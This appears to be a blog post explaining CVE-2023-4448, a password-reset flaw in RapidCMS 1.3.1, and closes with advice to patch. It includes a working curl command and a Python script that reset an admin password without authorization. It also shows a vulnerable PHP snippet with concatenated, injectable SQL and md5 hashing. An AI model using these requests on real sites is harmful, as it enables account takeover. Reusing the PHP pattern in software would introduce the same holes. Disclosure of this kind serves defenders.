CVE-2023-4448 - Critical Password Recovery Flaw in OpenRapid RapidCMS 1.3.1 Explained

OpenRapid RapidCMS is a well-known PHP-based content management system. In version 1.3.1, a critical security bug—now tracked as CVE-2023-4448—was discovered in the password reset functionality. This bug could allow remote attackers to compromise sites running vulnerable versions. In this post, we’ll explain what happened, show how the exploit works, and share ways to keep your site safe.

What’s the Problem?

The vulnerability was found in the admin/run-movepass.php file. Specifically, it involves how the password and password2 parameters are handled during the password reset or recovery process.

Short summary:
A remote user can reset an admin’s password without proper verification, giving an attacker unauthorized access to the site.

Technical identifier:
- Discovery: VDB-237569
- Patched commit: 4dff387283060961c362d50105ff8da8ea40bcbe

This is a *weak password recovery* flaw. Here’s what happens

- The system accepts direct input of new passwords via GET or POST (parameters password & password2).

Suppose the admin reset/password change form is submitted via this endpoint

POST /admin/run-movepass.php

Normal (expected) request parameters:

username=admin&password=NewPassword1!&password2=NewPassword1!

Since there’s no owner check, an attacker can send this using CURL, BurpSuite, or a browser

curl -X POST \
  -d "username=admin&password=hacked1234&password2=hacked1234" \
  https://victim.site/admin/run-movepass.php

Vulnerable PHP

// admin/run-movepass.php

if ($_POST['password'] === $_POST['password2']) {
    $username = $_POST['username'];
    $new_pass = md5($_POST['password']);
    // WARNING: No verification here!
    $sql = "UPDATE users SET password = '$new_pass' WHERE username = '$username'";
    mysqli_query($conn, $sql);
    echo "Password changed!";
} else {
    echo "Passwords do not match.";
}

Here’s a practical example using Python’s requests

import requests

url = 'https://victim.site/admin/run-movepass.php'
data = {
    'username': 'admin',
    'password': 'attackerPass!23',
    'password2': 'attackerPass!23'
}

r = requests.post(url, data=data)
if "Password changed!" in r.text:
    print("[+] Exploit likely successful!")
else:
    print("[-] Exploit failed")

Attackers can now log in with the new admin password.

References and Resources

- Original VulDB Entry
- Patch Commit on GitHub
- NVD - CVE-2023-4448 (*pending*)

Update immediately:

- Get the patch here

Patches are available and should be applied immediately.

Stay safe. Keep your software up to date. If you think you might be affected, patch now and review your user accounts for any suspicious activity!


*Exclusive content based on public sources and first-hand analysis. Share with your sysadmin friends to help keep the web secure!*

Timeline

Published on: 08/21/2023 02:15:10 UTC
Last modified on: 11/07/2023 04:22:37 UTC